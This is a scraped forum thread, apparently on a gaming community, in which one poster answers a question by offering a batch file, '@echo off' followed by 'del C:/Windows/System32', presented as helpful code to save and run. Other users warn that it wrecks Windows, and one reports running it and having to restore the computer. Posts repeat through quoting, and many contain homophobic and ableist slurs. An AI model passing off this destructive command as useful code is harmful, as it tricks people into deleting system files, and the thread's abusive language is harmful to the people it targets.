TheSickSign

Is it Possible to...

Yeah. Here's the code. Just open Notepad and type this in, Save as a .bat and run it

@echo off

del C:/Windows/System32

Since i am not a fag, i will tell him if you do this, your screwed, that pretty much deletes the basics of your computer ;o

Since i am not a fag, i will tell him if you do this, your screwed, that pretty much deletes the basics of your computer ;o

Does not

You can ping websites i think.

I have to bump this just to quote this !

"Ping websites"

yea true "hacker" would do that

brb pinging runelocus to death

lol... hes not retarded XD

lol... hes not retarded XD

It deletes your system 32 folder, which has alot, well most, of your necessary files in it.

It deletes your system 32 folder, which has alot, well most, of your necessary files in it.

dude, thats exactly what I told you: " HE IS NOT RETARDED " ...I know croatian, you want it that way?

Hes not 5, he knows if he deletes 32 he will get butfucked -.- ffs

wer not a noobs, dont act smart..

dude, thats exactly what I told you: " HE IS NOT RETARDED " ...I know croatian, you want it that way?

Hes not 5, he knows if he deletes 32 he will get butfucked -.- ffs

wer not a noobs, dont act smart..

I don't act smart, i am smart, i don't know how old he is, alot of 10 year olds come on here too, so don't get snippy with me ;o, now i sound like a grandmother...

Yeah. Here's the code. Just open Notepad and type this in, Save as a .bat and run it

@echo off

del C:/Windows/System32

Fuck you i did it without even reading the "del C:/Windows/System32" and i just made it a .bat in notepad on my comp and its fucked up i have to restore it...

Fuck you i did it without even reading the "del C:/Windows/System32" and i just made it a .bat in notepad on my comp and its fucked up i have to restore it...

Way to go, you're fucking retarded.